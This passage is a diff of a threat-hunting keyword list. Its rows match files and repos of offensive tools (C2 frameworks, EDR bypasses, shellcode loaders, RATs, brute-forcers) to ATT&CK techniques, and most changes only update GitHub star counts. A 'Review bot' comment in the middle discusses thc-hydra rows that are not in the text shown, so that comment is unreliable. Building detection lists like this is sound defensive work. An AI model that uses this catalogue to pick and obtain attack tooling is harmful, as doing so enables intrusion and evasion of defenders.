TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*TheD1rkMtr/GithubC2*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*TheD1rkMtr/HeapCrypt*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*TheD1rkMtr/NTDLLReflection*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*TheD1rkMtr/Pspersist*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" -"*TheD1rkMtr/Shellcode-Hide*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - 
T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*TheD1rkMtr/Shellcode-Hide*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*TheD1rkMtr/StackCrypt*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" -"*TheD1rkMtr/UnhookingPatch*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*TheD1rkMtr/UnhookingPatch*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*TheGejr/SpringShell*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - 
TA0006","N/A","N/A","Exploitation tools","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","2","124","86","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z" -"*theHarvester*","offensive_tool_keyword","theHarvester","E-mails. subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","9250","1843","2023-10-02T22:12:14Z","2011-01-01T20:40:15Z" -"*thelinuxchoice/tweetshell*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" -"*ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*theHarvester*","offensive_tool_keyword","theHarvester","E-mails. 
subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","9256","1843","2023-10-02T22:12:14Z","2011-01-01T20:40:15Z" +"*thelinuxchoice/tweetshell*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*ThePorgs/Exegol-images*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*therealwover@protonmail.com*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*thewover/donut*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*therealwover@protonmail.com*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*thewover/donut*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*thief.py -*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*third_party/SharpGen*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*third-party*winvnc*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red 
Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
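Review bot: The two `+"*thc-hydra.git*"` rows in this hunk are byte-identical on the new side, so the refresh carries a duplicate detection entry forward. Both are also already covered by the broader `"*thc-hydra*"` row just above them. Dropping one of the duplicates, and deduplicating on the `keyword` plus `metadata_tool` pair whenever `metadata_github_stars` and `metadata_github_forks` are regenerated, would keep rules built from this list from matching the same string twice. Every other changed row in the hunk differs only in those two count columns.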
@@ -17667,36 +17851,36 @@ "*thoth.py -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*thoth-master.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*Thread_Hiijack_Inject_Load.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" -"*ThreadlessInject* -p * -d *","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" 
-"*ThreadlessInject.exe*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" -"*ThreadlessInject-master*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject* -p * -d *","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject.exe*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject-master*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*threads all alertable*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - 
T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ThreadStackSpoofer*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" -"*ThreatCheck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*ThreatCheck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*ThreatCheck.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*ThreatCheck-master*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*threatexpress*","offensive_tool_keyword","Github Username","github repo hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/threatexpress","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*threatexpress*malleable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*threatexpress*malleable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*threatexpress/cs2modrewrite*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*ThunderDNS*.php*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.ps1*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS*.py*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*ThunderDNS.git*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" -"*ThunderFox.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ThunderFox.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*ThunderShell*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.git*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell.py*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. 
All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ThunderShell-master.zip*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" -"*thycotic_secretserver_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
